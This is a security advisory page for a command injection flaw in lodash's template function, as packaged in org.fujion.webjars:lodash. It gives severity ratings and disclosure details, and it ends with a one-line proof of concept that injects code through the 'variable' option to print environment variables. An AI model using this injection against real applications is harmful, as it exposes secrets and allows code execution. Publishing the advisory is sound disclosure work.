Command Injection Affecting org.fujion.webjars:lodash Open this link in a new tab package, versions [0,]


0.0
high
  • Exploit Maturity

    Proof of concept

  • Attack Complexity

    Low

  • Privileges Required

    High

  • Confidentiality

    High

  • Integrity

    High

  • Availability

    High

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • snyk-id

    SNYK-JAVA-ORGFUJIONWEBJARS-1074932

  • published

    15 Feb 2021

  • disclosed

    17 Nov 2020

  • credit

    Marc Hassan

How to fix?

There is no fixed version for org.fujion.webjars:lodash.

Overview

org.fujion.webjars:lodash is a modern JavaScript utility library delivering modularity, performance, & extras.

Affected versions of this package are vulnerable to Command Injection via template.

PoC

var _ = require('lodash');

_.template('', { variable: '){console.log(process.env)}; with(obj' })()